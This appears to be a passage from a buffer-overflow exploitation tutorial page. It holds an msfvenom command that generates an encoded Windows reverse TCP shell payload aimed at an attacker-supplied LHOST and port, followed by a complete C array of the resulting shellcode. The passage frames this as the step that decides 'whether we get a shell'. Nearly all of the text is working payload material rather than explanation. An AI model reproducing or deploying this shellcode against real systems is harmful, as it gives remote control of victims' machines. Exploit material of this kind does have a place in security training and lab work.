This is the most crucial step as it decides whether we get a shell!
msfvenom -p windows/shell_reverse_tcp LHOST=<IP> LPORT=<PORT> EXITFUNC=thread -f c –e x86/shikata_ga_nai -b "<BADCHARS>" > shellcode.c
Last updated
Was this helpful?
Was this helpful?
unsigned char buf[] =
"\x33\xc9\x83\xe9\xaf\xe8\xff\xff\xff\xff\xc0\x5e\x81\x76\x0e"
"\x65\x02\xba\x95\x83\xee\xfc\xe2\xf4\x99\xea\x38\x95\x65\x02"
"\xda\x1c\x80\x33\x7a\xf1\xee\x52\x8a\x1e\x37\x0e\x31\xc7\x71"
"\x89\xc8\xbd\x6a\xb5\xf0\xb3\x54\xfd\x16\xa9\x04\x7e\xb8\xb9"
"\x45\xc3\x75\x98\x64\xc5\x58\x67\x37\x55\x31\xc7\x75\x89\xf0"
"\xa9\xee\x4e\xab\xed\x86\x4a\xbb\x44\x34\x89\xe3\xb5\x64\xd1"
"\x31\xdc\x7d\xe1\x80\xdc\xee\x36\x31\x94\xb3\x33\x45\x39\xa4"
"\xcd\xb7\x94\xa2\x3a\x5a\xe0\x93\x01\xc7\x6d\x5e\x7f\x9e\xe0"
"\x81\x5a\x31\xcd\x41\x03\x69\xf3\xee\x0e\xf1\x1e\x3d\x1e\xbb"
"\x46\xee\x06\x31\x94\xb5\x8b\xfe\xb1\x41\x59\xe1\xf4\x3c\x58"
"\xeb\x6a\x85\x5d\xe5\xcf\xee\x10\x51\x18\x38\x6a\x89\xa7\x65"
"\x02\xd2\xe2\x16\x30\xe5\xc1\x0d\x4e\xcd\xb3\x62\xfd\x6f\x2d"
"\xf5\x03\xba\x95\x4c\xc6\xee\xc5\x0d\x2b\x3a\xfe\x65\xfd\x6f"
"\xc5\x35\x52\xea\xd5\x35\x42\xea\xfd\x8f\x0d\x65\x75\x9a\xd7"
"\x2d\xff\x60\x6a\x7a\x3d\x65\x6e\xd2\x97\x65\x02\x8f\x1c\x83"
"\x68\xaa\xc3\x32\x6a\x23\x30\x11\x63\x45\x40\xe0\xc2\xce\x99"
"\x9a\x4c\xb2\xe0\x89\x6a\x4a\x20\xc7\x54\x45\x40\x0d\x61\xd7"
"\xf1\x65\x8b\x59\xc2\x32\x55\x8b\x63\x0f\x10\xe3\xc3\x87\xff"
"\xdc\x52\x21\x26\x86\x94\x64\x8f\xfe\xb1\x75\xc4\xba\xd1\x31"
"\x52\xec\xc3\x33\x44\xec\xdb\x33\x54\xe9\xc3\x0d\x7b\x76\xaa"
"\xe3\xfd\x6f\x1c\x85\x4c\xec\xd3\x9a\x32\xd2\x9d\xe2\x1f\xda"
"\x6a\xb0\xb9\x5a\x88\x4f\x08\xd2\x33\xf0\xbf\x27\x6a\xb0\x3e"
"\xbc\xe9\x6f\x82\x41\x75\x10\x07\x01\xd2\x76\x70\xd5\xff\x65"
"\x51\x45\x40";